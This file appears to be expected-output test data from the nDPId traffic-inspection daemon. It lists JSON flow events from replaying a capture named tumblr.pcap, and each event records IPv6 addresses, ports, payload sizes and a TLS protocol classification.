+00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605292105433,"flow_last_seen":1605292106000,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7251,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"}} +00680{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605292122064,"flow_last_seen":1605292122440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6040,"flow_tot_l4_payload_len":76219,"flow_avg_l4_payload_len":712,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":21017,"flow_first_seen":1605292105669,"flow_last_seen":1605292122890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2772,"flow_tot_l4_payload_len":20045142,"flow_avg_l4_payload_len":953,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1671,"flow_first_seen":1605292108895,"flow_last_seen":1605292115212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2426,"flow_tot_l4_payload_len":1035742,"flow_avg_l4_payload_len":619,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1605292103810,"flow_last_seen":1605292122755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2294,"flow_tot_l4_payload_len":522833,"flow_avg_l4_payload_len":606,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605292105197,"flow_last_seen":1605292105378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":19710,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1605292105274,"flow_last_seen":1605292105347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
